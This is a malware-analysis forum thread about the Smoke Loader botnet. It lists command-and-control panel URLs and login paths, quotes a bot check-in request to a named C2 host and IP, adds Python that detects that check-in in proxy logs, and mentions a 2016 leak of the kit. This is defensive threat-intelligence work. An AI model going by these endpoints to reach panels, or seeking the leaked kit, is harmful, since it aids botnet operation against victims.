A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #13137  by leeno
 Thu May 10, 2012 9:22 pm
Live CnC Guest Login url for smokeloader

regmexicooo1.ru/ura/guest.php
razorbladesfuture.ru/images/guest.php
beaufortseaa139.ru/qad/guest.php
 #13139  by Xylitol
 Thu May 10, 2012 9:36 pm
Admin login: /control.php
The header of razorbladesfuture.ru and regmexicooo1.ru are different "smoke bot"
http://razorbladesfuture.ru/images/imgs/header.png
this one is a smoke bot:
http://beaufortseaa139.ru/qad/imgs/header.png
Anyway, smoke bot and smoke loader have the same structure, with one difference: smoke loader has a 'footer.png' while smoke bot doesn't have one.
 #14016  by Xylitol
 Sat Jun 16, 2012 7:48 am
GET /tmp/index.php?cmd=getload&login=783083C3BA00BE137&file=0&sel=77777
Host: italydveris.eu
• dns: 1 ›› ip: 91.217.162.45 - adresse: ITALYDVERIS.EU

https://www.virustotal.com/file/857fc7a ... /analysis/
Smoke Loader
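Added example (not part of the original posts): a proxy-log check keyed to the query-string shape of the `getload` request quoted above. The log format, the client addresses, the `example.test` hosts, and the assumption that `login` is always a hex string are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the login value is a hex string, as in the quoted request.
HEX_ID = re.compile(r"^[0-9A-Fa-f]{8,64}$")
PARAMS = ("cmd", "login", "file", "sel")

def is_getload_checkin(url):
    """True if the query string has the shape of the quoted getload request."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    # All four parameters must be present exactly once.
    if any(len(query.get(name, [])) != 1 for name in PARAMS):
        return False
    cmd, login, file_id, sel = (query[name][0] for name in PARAMS)
    return (cmd == "getload" and HEX_ID.match(login) is not None
            and file_id.isdigit() and sel.isdigit())

def scan(lines):
    """Return (client_ip, host) for each log line whose URL matches."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:  # constructed format: time client method url
            continue
        _, client, _, url = fields
        if is_getload_checkin(url):
            hits.append((client, urlsplit(url).hostname))
    return hits

# Constructed proxy log; only the first URL is taken from the post above.
SAMPLE_LOG = """\
2012-06-16T07:41:02Z 10.0.0.5 GET http://italydveris.eu/tmp/index.php?cmd=getload&login=783083C3BA00BE137&file=0&sel=77777
2012-06-16T07:41:09Z 10.0.0.8 GET http://intranet.example.test/index.php?cmd=getload&file=0
2012-06-16T07:42:30Z 10.0.0.8 GET http://shop.example.test/index.php?cmd=view&login=alice&file=3&sel=1
"""

if __name__ == "__main__":
    for client, host in scan(SAMPLE_LOG.splitlines()):
        print(f"possible Smoke Loader check-in: {client} -> {host}")
```

Matching on parameter structure rather than on the host keeps the check useful when the panel moves to a new domain, but it only covers builds that keep these parameter names.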
 #28334  by marnie
 Sun Apr 17, 2016 1:57 pm
smoke 04.2016 leak (exe; plugins; panel)